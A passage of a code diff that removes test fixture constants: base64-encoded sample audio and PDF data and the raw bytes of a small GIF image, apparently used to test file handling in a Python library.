ABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAABKwAAASsAAAEqAAAAOHN0Y28AAAAAAAAACgAAACwAADXXAABrgQAAwYwAARKNAAFhWwABztsAAiToAAKY1gADEjk=", -} -BASE64_FILE = { - "name": "test/test_files/sample_file.pdf", - "data": "data:@file/pdf;base64,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", -} -BINARY_IMAGE = ( - b'GIF89a=\x00D\x00\xf7\xa8\x00\x9a,3\xff\xc0\xc0\xef\xc0\xc0uXg\xfc\xf9\xf7\x993\x00\xff\xec\xec\xff\xa0\xa0\xe5\xcc\xbf\xcf\x9f\x87\x0f\xef\xef\x7f\x7f\x7f\xef\x0f\x0f\xdf\x1f\x1f\xff&&_\x9f\x9f\xffYY\xbf??5\xa5\xc2\xff\xff\xff\xac\x16\x19\xb2&\x00\xf8\x13\x10\xc2& \xdf`PP\x84\x9b\xf8\x03\x00\xb5\x0b\x0c\xdf\x0f\x00>\x9a\xb5\x87BM\x7f`P\xd2\xa5\x8f\xcc\x19\x00\xa5,\x00\xec\xd9\xcf\xe5\x0c\x00\xeb\t\x00\xff\xd9\xd9\xc7\x0c\x0c\x0f\x0f\x0f\xffyy~MZ\xfb\t\x08\xe5M@\xfb__\xff33\xcf\x90x\xf2\xe5\xdf\xc3\x06\x06\xbf\t\x08\xff\xb3\xb3\xd9\xb2\x9f\xff\x06\x06\xac)\x00\xff\xc6\xc6\x0c\t\x08\xf9\xf2\xef\xc9s`\xb8#\x00\x9f/\x00\xff__\xff\x8c\x8c\xc5\x1c\x00\xdf33\xffpp\xcf\x19\x19\xc0\x13\x10\xbf\x90x\xf7YY\xff\xf6\xf6\xe7??\xd7&&\xefLL2& \xdf\xbf\xaf\xbf\xbf\xbf???\xc5M@cn\x81_\x00\x00___\xcb00\xd8\x13\x00YC8\x80\x80\x80\xf3RRsVH\xc490\x10\x10\x10\x917@\xf2\x06\x00\xcf@@\xca\x86pooo\xa3!&\xc1\x1d\x18\xcf//\x1f\x1f\x1f\xdf\x00\x00\xd2\x16\x00\xcb\x90x\xbf\x1f\x00\x19\x13\x10\xf3\xd0\xd0\xe399&\x1d\x18Yy\x8e\x8f\x8f\x8f\xff\xa9\xa9\xcb\x13\x13\xbf00SF@\xb6& >\x1d\x18\xfb\xdd\xdd@@@\x99\x93\x90\xff\xbc\xbc\x7fPP\xaf\xaf\xaf\xc6VHzsp\x93& \xb7pp\xb3\x86ptPP|pp\xafOO\xd0\xd0\xd0\xef\xef\xefL90\xbc\xa9\xa0o0(\xeb\xb0\xb0\xff\xe0\xe0\xff\xd0\xd0\x870(K0(\xc9|h\x9f__lct\xebFF\xcf\xcf\xcf\xe0\xe0\xe0b& \xff 
